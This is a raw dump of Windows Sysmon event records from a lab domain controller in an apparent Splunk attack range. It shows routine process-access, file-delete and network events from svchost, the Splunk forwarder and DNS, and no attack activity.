10341000x80000000000000002202028Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202027Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202026Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202025Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202024Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202023Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202022Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202021Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202020Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202019Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202018Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202017Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202016Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202015Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202014Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202013Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202012Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002202011Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.223{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1BE6030B834067751A1621ADC0269BA1,SHA256=554BFFF5E1470AE9E061B69C4F5A68CB709CCEB569D400FC8A783B494119BB35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202010Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.020{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0D6ABCD5F94C43B69BFBA6760A2079E,SHA256=CAC1B3A087BE8C2FCB9FD80B53DC8814E44627149F849FF0E29A83A039C41F7F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202046Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:32.043{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60599-false10.0.1.12-8000- 23542300x80000000000000002202045Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:35.535{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7DE28B4842B2BF78833239FC2699AB5,SHA256=4342144A57778A3B88BD553E18562F6E0E6AF191470EB1526407DE7525D48D98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202048Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:36.895{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E374589C466714D5D18135A2CFD670FE,SHA256=CB2659256FAE714C043389D38A33E4B4F41DCDFD26E196A8F9298B6292AB484A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202047Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:36.535{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1773B8336D21D0962F62999A3240B89,SHA256=1F3BBBF2D3AEF4705A133478BC5179C4B0957F4D2B3246FA835B9A23E5B919A5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202050Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:33.699{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local61762- 23542300x80000000000000002202049Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:37.551{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9833B34C9689B1C587CC7AF36D380442,SHA256=B28201EE9CA7039144B20BBBEB62EFDB3F6D2CB11BA82A469772A829E230E4A4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202052Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.715{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-61762- 23542300x80000000000000002202051Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:38.598{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85E5E394BB74232DA68D1F4D58471884,SHA256=40B3234DAF469E499B07B57200F9C0991026F2894BF7B545759525693580064F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202053Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:39.801{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5056F0F0D4AF2F8866DDDB3136CA613,SHA256=CA59D8EA7EC22A05FA4E40854AD79B260A1FA36449BA93855AB17BCB93EA972E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202054Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:40.816{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=145D8410890E5CE352EB09F89715BC5E,SHA256=B7B59690CBDA86E7199E7B19C62E71C4F77AB1CA139D420455FD19E6CC60228E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202056Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:41.895{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F4854371C80DB1A6C2FA53AFFAB5C97,SHA256=D78A7BB4BFA24972255F0861183FD7D1E6D15471503EE731DCAAB0442C99F8F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202055Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:41.285{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=90ED616F5B48F464FD31B8F40ACE1F82,SHA256=2814B10404FCB5C351CD96B16FCBE07E74AA2CD520B0D2A4B02D84656ACC9A8E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202057Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:38.059{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60600-false10.0.1.12-8000- 23542300x80000000000000002202058Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:43.035{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FE134C11DAFA6D20904BB2D8D2A537E,SHA256=A57C771ED134DCC2187AD618903F000A9E276CAC94E76CA70D9B5AA616D11CB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202060Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:44.973{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CDACCC94DD1FBCB452137B944F41C320,SHA256=9308020A9168E192759B120600698C17912690BDBCFA2940A2908E06FE210A2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202059Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:44.082{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F34B1E9B1758A899BD4F9D9EC4FD95E3,SHA256=1C25B58D947C7EF148C2171A3DCA55CD134E6464704556D5ECF7E1975C97BB3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202061Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:45.113{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35237B756181CA3706E7B405B09B3E01,SHA256=3D00D79D8A345EA943F0501CA52B4F0820549804D97FA394F08C3E80346465CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202062Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:46.160{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FF6BC6D7D03FDE38E93DA3F980AE1A3,SHA256=73FFD278ECEC07D6286CED5EBFAB4E7E09D1C18B023C221C64A787120C81C518,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202064Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:47.191{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=395515212C3C3A5B0E1DEE60396130E9,SHA256=F3BF946E2D0678F471A67EDF5A0AAF6CA176FE6A03010E071DF0AE1697CAFC0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202063Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:47.145{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E3A9392512066DF4CA58602D4F2AEC56,SHA256=ADF87EF73E0D9DC7B7BFDC49F9E55CBC988F53449BCACB2886FD5B5A7BF19588,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202066Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:48.238{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=099BF03174E0D6E6A349E0274FBBD59E,SHA256=CA399440CFD6806FBAEB19E5FF5588287CB508F0AAD6759AC06B5E9E36DA3CD8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202065Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:43.903{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60601-false10.0.1.12-8000- 23542300x80000000000000002202067Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:49.238{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8DD119D52F6F9DAA68ED53A1E8CEF00,SHA256=3A371210C1515887E2D1740EB36E4FE86B88625900D1C54C679248C9EE2EC968,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202068Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:50.238{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C3D40748FC58D85266F3CEB2C8F07B4,SHA256=B81F59B61898831C10D74E171ECA48EBA4C8496E0F4A90CB02ED8D9B8B2A252F,IMPHASH=00000000000000000000000000000000falsetrue 